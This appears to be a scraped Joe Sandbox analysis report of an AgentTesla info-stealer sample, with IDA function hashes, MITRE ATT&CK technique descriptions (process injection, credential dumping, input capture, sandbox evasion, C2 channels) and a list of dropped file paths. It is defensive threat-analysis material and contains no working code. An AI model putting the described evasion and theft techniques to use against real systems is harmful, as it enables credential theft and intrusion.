Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233d0000_wab.jbxd

Similarity

API ID:
String ID: $qq$$qq$$qq$$qq
API String ID: 0-3704488771
Opcode ID: c90d269b305651b1bc211e1a867d8090db4c70885109da5455acf551964c432d
Instruction ID: a34c3793ac9ead3de91a52a8c8dc0c14247cc16a719d53c3459c75cd7ba1f3a0
Opcode Fuzzy Hash: c90d269b305651b1bc211e1a867d8090db4c70885109da5455acf551964c432d
Instruction Fuzzy Hash: 7C518F73A00209CFCF15EB68DA9069EB3F6EB84312F1485A9E415DB356DB34EE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 233D8428 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$qq, xrefs: 233D84B3
LRqq, xrefs: 233D856A
LRqq, xrefs: 233D851B
$qq, xrefs: 233D84A7

Memory Dump Source

Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233d0000_wab.jbxd

Similarity

API ID:
String ID: LRqq$LRqq$$qq$$qq
API String ID: 0-2668842011
Opcode ID: d6551959022eed41610bc18ab7b332ae62f0aa3d947ebe998e73032ccc47659d
Instruction ID: 1af987f337b040033a4e37fb655c20441f546e234e6595660ba73ee1e2f06654
Opcode Fuzzy Hash: d6551959022eed41610bc18ab7b332ae62f0aa3d947ebe998e73032ccc47659d
Instruction Fuzzy Hash: 3051B1727002199FCB08EB28C980A5AB7F6FF88701F1585A9E4169F396DB34ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report hnTW5HdWvY.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\Start Menu\farseringernes.ini

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nkcd1eg.nnq.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pdlbq1nd.n31.ps1

C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\opbruger.clu

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\tinfoil.uln

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\ugredes.txt

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\yderligheders.arc

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bedrivendes\afgiftsforhjelse.unr

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bedrivendes\antifrictional.bel

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bedrivendes\cumins.fed

Windows Analysis Report
hnTW5HdWvY.exe

Function 100010D3 Relevance: 130.1, APIs: 66, Strings: 8, Instructions: 571
stringfilememoryCOMMON

Function 004030CB Relevance: 79.1, APIs: 27, Strings: 18, Instructions: 324
stringfilecomCOMMON

Function 00404FA3 Relevance: 54.3, APIs: 36, Instructions: 280
windowclipboardmemoryCOMMON

Function 00405B9C Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199
stringCOMMON

Function 0040543A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 159
filestringCOMMON

Function 00403995 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre